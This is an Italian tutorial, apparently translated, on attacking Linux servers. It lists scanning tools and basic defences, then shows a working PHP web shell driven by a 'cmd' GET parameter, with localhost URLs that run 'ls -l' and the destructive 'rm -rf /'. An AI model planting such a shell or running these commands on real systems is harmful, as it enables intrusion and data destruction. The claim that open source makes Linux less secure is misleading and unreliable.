Hacking del sistema operativo Linux: hacking con Ubuntu (Tutorial sui comandi)
Linux è il sistema operativo server più utilizzato, in particolare per i server web. È open source; questo significa che chiunque può avere accesso al codice sorgente. Ciò lo rende meno sicuro rispetto ad altri sistemi operativi poiché gli aggressori possono studiare il codice sorgente per trovare vulnerabilità. Linux per gli hacker significa sfruttare queste vulnerabilità per ottenere l'accesso non autorizzato a un sistema.
In questo articolo ti presenteremo cos'è Linux, le sue vulnerabilità di sicurezza e l'hacking Ubuntu e le contromisure che puoi mettere in atto.
Nota veloce su Linux
Linux è un sistema operativo open sourceEsistono molte distribuzioni di sistemi operativi basati su Linux come Redhat, Fedora e Ubuntu, ecc. A differenza di altri sistemi operativi, Linux è meno sicuro quando si tratta di sicurezza. Questo perché il codice sorgente è disponibile gratuitamente, quindi è facile studiarlo per le vulnerabilità e sfruttarle rispetto ad altri sistemi operativi che non sono open source. Linux può essere utilizzato come sistema operativo per server, desktop, tablet o dispositivi mobili.
I programmi Linux possono essere gestiti utilizzando la GUI o i comandi. I comandi Linux per Kali Linux l'hacking è più efficace ed efficiente rispetto all'utilizzo della GUI. Per questo motivo è utile conoscere i comandi Linux di base per l'hacking.
Fare riferimento a questi tutorial https://www.guru99.com/unix-linux-tutorial.html su come iniziare Kali Linux hack.
Strumenti di hacking su Linux
- Nessus– questo strumento può essere utilizzato per Ubuntu hack, scansiona le impostazioni di configurazione, le patch e le reti ecc. può essere trovato su https://www.tenable.com/products/nessus
- NMap. Questo strumento può essere utilizzato per monitorare gli host in esecuzione sul server e i servizi che utilizzano. Può anche essere utilizzato per eseguire la scansione delle porte. Può essere trovato su https://nmap.org/
- SARA – SARA è l'acronimo di Security Auditor's Research Assistant. Come suggerisce il nome, questo strumento può essere utilizzato per controllare le reti contro minacce come SQL Injection, XSS ecc. può essere trovato su http://www-arc.com/sara/sara.html
L'elenco sopra riportato non è esaustivo; ti dà un'idea degli strumenti disponibili per Ubuntu hacking e hacking di sistemi Linux.
Come prevenire gli hack di Linux
L'hacking Linux sfrutta le vulnerabilità del sistema operativo. Un'organizzazione può adottare la seguente politica per proteggersi da tali attacchi.
- Gestione delle patch– le patch risolvono i bug che gli aggressori sfruttano per compromettere un sistema. Una buona politica di gestione delle patch garantirà l'applicazione costante delle patch pertinenti al tuo sistema.
- Configurazione corretta del sistema operativo– altri exploit sfruttano i punti deboli nella configurazione del server. I nomi utente e i demoni inattivi dovrebbero essere disabilitati. Le impostazioni predefinite come le password comuni per l'applicazione, i nomi utente predefiniti e alcuni numeri di porta dovrebbero essere modificati.
- Sistema di rilevamento intrusioni– tali strumenti possono essere utilizzati per rilevare accessi non autorizzati al sistema. Alcuni strumenti hanno la capacità di rilevare e prevenire tali attacchi.
Attività di hacking: hackerare a Ubuntu Sistema Linux che utilizza PHP
In questo scenario pratico impareremo come hackerare Ubuntu e ti forniremo le informazioni di base su come puoi utilizzarlo PHP compromettere un Linux. Non prenderemo di mira nessuna vittima. Se vuoi provarlo, puoi installare LAMPP sul tuo computer locale.
PHP viene fornito con due funzioni che possono essere utilizzate per eseguire comandi di hacking di Linux. Ha le funzioni exec() e shell_exec(). La funzione exec() restituisce l'ultima riga dell'output del comando mentre shell_exec() restituisce l'intero risultato del comando come una stringa.
A scopo dimostrativo, supponiamo che l'attaccante carichi il seguente file su un server web.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
QUI,
Lo script precedente ottiene il comando dalla variabile GET denominata cmd. Il comando viene eseguito utilizzando shell_exec() e i risultati vengono restituiti nel browser.
Il codice sopra può essere sfruttato utilizzando il seguente URL
http://localhost/cp/konsole.php?cmd=ls%20-l
QUI,
- “…konsole.php?cmd=ls%20-l”assegna il valore ls –l alla variabile cmd.
Il comando in Ubuntu per l'hacking contro il server verrà eseguito come
shell_exec('ls -l') ;
L'esecuzione del codice sopra riportato su un server web produce risultati simili ai seguenti.
Il comando precedente visualizza semplicemente i file nella directory corrente e le autorizzazioni
Supponiamo che l'attaccante passi il seguente comando
rm -rf /
QUI,
- "rm" rimuove i file
- "rf" esegue il comando rm in modalità ricorsiva. Eliminazione di tutte le cartelle e i file
- "/" indica al comando di avviare l'eliminazione dei file dalla directory principale
L'URL di attacco sarebbe simile a questo
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Sommario
- Linux è un sistema operativo popolare per server, desktop, tablet e dispositivi mobili.
- Linux è open source e il codice sorgente può essere ottenuto da chiunque. Ciò rende facile individuare le vulnerabilità. È uno dei migliori sistemi operativi per gli hacker.
- Comandi di hacking di base e di rete in Ubuntu sono preziosi per gli hacker Linux.
- Le vulnerabilità sono punti deboli che possono essere sfruttati per compromettere un sistema.
- Una buona sicurezza può aiutare a proteggere un sistema dalla compromissione da parte di un utente malintenzionato.